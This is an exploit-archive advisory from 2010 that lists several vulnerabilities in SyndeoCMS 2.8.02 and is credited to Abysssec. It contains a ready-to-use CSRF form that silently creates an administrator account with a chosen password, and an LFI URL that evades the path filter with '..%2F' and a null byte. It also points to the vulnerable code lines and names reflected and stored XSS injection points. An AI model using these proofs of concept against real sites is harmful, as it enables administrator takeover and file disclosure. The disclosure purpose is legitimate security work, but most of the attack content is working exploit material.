syndeocms 2.8.02 Multiple Vulnerabilities
Posted on 04 September 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>syndeocms 2.8.02 Multiple Vulnerabilities</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>========================================= syndeocms 2.8.02 Multiple Vulnerabilities ========================================= Title : syndeocms 2.8.02 Multiple Vulnerabilities Affected Version : syndeocms <= 2.8.02 Vendor Site : http://www.syndeocms.org/ Discovery : abysssec.com Description : This CMS have many critical vulnerability that we refere to some of those here: Vulnerabilites : 1. CSRF - Add Admin Account: <html> <body> <form onsubmit="return checkinput(this);" action="index.php?option=configuration&suboption=users&modoption=save_user&user_id=0" name="form" method="POST"> <input class="textfield" type="hidden" name="fullname" value="csrf"/> <input class="textfield" type="hidden" name="username" value="csrf_admin"/> <input class="textfield" type="hidden" name="password" value="admin123"/> <input class="textfield" type="hidden" name="email" value="csrf@admin.com"/> <select name="editor"> <option value="1" selected="">FCKEditor</option> <option value="2">Plain text Editor</option> </select> <input type="checkbox" checked="" name="initial" value="1"/> <input class="textfield" type="hidden" value="" name="sections"/> <input type="radio" name="access_1" value="1"/> <input type="radio" name="access_2" value="1"/> . . . <input type="radio" name="access_15" value="1"/> <input type="radio" name="m_access[0]" value="1"/> . . . <input type="radio" name="m_access[21]" value="1"/> <input class="savebutton" type="submit" name="savebutton" value=" Save"/> </form> </body> </html> ------------------------------------- 2. LFI (Local File Inclusion): http://localhost/starnet/index.php?option=configuration&suboption=configuration&modoption=edit_css&theme=..%2Findex.php%00 in starnetcorecon_configuration.inc.php file, As you may noticed theme parameter is checked for "../" and could be bypass by with "..%2F": line 61-73: switch ($modoption) // start of switch { case save_css : if (IsSet ($_POST['content'])) { $content = $_POST['content']; } if (strpos($theme, "../") === FALSE) //check if someone is trying to fool us. { $filename = "themes/$theme/style.css"; ------------------------------------- 3. xss: in starnetcorecon_alerts.inc.php file "email" parameter when "modoption" is "save_alert": http://localhost/starnet/index.php?option=configuration&suboption=alerts&modoption=edit_alert&alert=2 4. stored xss: in starnetcorecon_alerts.inc.php file "name" parameter when "modoption" is "save_alert": http://localhost/starnet/index.php?option=configuration&suboption=alerts&modoption=edit_alert ------------------------------ # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-04]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
